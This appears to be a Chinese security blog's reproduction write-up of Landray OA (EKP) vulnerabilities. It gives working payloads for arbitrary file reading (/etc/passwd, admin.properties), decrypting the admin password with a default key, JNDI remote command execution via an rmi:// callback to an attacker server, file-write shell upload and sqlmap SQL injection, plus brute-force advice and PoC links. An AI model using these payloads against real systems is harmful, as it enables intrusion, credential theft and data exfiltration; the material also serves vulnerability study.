蓝凌OA漏洞复现

又是学习漏洞的一天，老是能听到蓝凌OA爆发了什么，我就很蒙蔽，想问问旁边师傅，蓝凌是个什么，又怕师傅来句你连蓝凌都不知道，怪尴尬，索性还是靠自己把，今天复现蓝凌OA

深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息。

访问/sys/ui/extend/varkind/custom.jsp，抓包并修改为POST，并加上payload（var={“body”:{“file”:“file:///etc/passwd”}}），在此进行发包 但是嘛，保不齐人家不是linux系统，所以不要试完这个payload读不出来，就代表它不存在漏洞

在github：https://github.com/Xd-tl/Landray-POC，需要请自取

深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息，读取配置文件得到密钥后访问 admin.do 即可利用 JNDI远程命令执行获取权限

利用任意文件读取/WEB-INF/KmssConfig/admin.properties配置文件 获得password,由于蓝凌OA默认是AES加密，且 默认密钥为 kmssAdminKey，所以只要拿着password进行解密就好（返回的password字符串去掉末尾的/r在进行解密） 拿到密码了发现是个弱密码这这这，竟然忘了爆破，势必得进一波后台啦，不然那就可太亏了，这都快2022年了，不会还有人不知道后台地址把，竟然是我不知道，大意了，赶紧百度一下，原来是久违的admin.do 利用burp对其抓包，并修改为POST，在加上payloadmethod=testDbConn&datasource=rmi://xxx.xxx.xxx.xxx:xxxx/cbdsdg ,现在我们先构造恶意的exp，类似于dnslog

对其进行编译，并让其兼容1.7 在把生成的exp.class文件放到我们服务器上，在使用marshalsec工具（https://github.com/mbechler/marshalsec）构建一个JNDI服务 最后就是发送payload 最后看服务器的记录，由于本地没有success文件所以会报404，但是目标是请求了咱的服务器， 说明成功执行了咱们的命令

蓝凌OA 存在任意文件写入漏洞，攻击者可以上传恶意文件

在上面的任意文件读取漏洞中，修改其payload为var={“body”:{“file”:“/sys/search/sys_search_main/sysSearchMain.do?method=editParam”}}&fdParemNames=11&fdParameters=[shellcode]即可 在shellcode位置补上，发包即可

有关详细操作，在我的Java安全专栏里面的BCEL Classloader（https://blog.csdn.net/xd_2021/article/details/121878806）文章里面最后复现了一个，该文章讲BCEL的，有兴趣的可以看看，关于BCEL编码工具我也是写了一个在github上（https://github.com/Xd-tl/BCELCode）

在github：https://github.com/Xd-tl/Landray-POC，需要请自取

深圳市蓝凌软件股份有限公司数字OA(EKP)存在SQL注入漏洞。攻击者可利用漏洞获取数据库敏感信息。

漏洞urlhttps://xxx.xxx.xxx.xxx/km/imeeting/km_imeeting_res/kmImeetingRes.do?contentType=json&method=listUse&orderby=1&ordertype=down&s_ajax=true 访问该url并对其抓包，拿到包后保存到文件里面，利用sqlmap -r即可

最后也是全部复现完了，也让我明白爆破的重要性，先爆，爆不出，在走正常路子

大家可以关注菜鸡的公众号，有什么好想法也可以让我学习一下，有什么问题可以一块解决，由于二维码违规，下面是base64编码的文字

5b6u5L+h5YWs5LyX5Y+34oCc5a6J5YWo5re35a2Q4oCd77yM5Y+v5Lul55So5b6u5L+h5pCc5LiA5pCc77yM5q2j5Zyo5a6M5ZaE5LitLi4uLi4u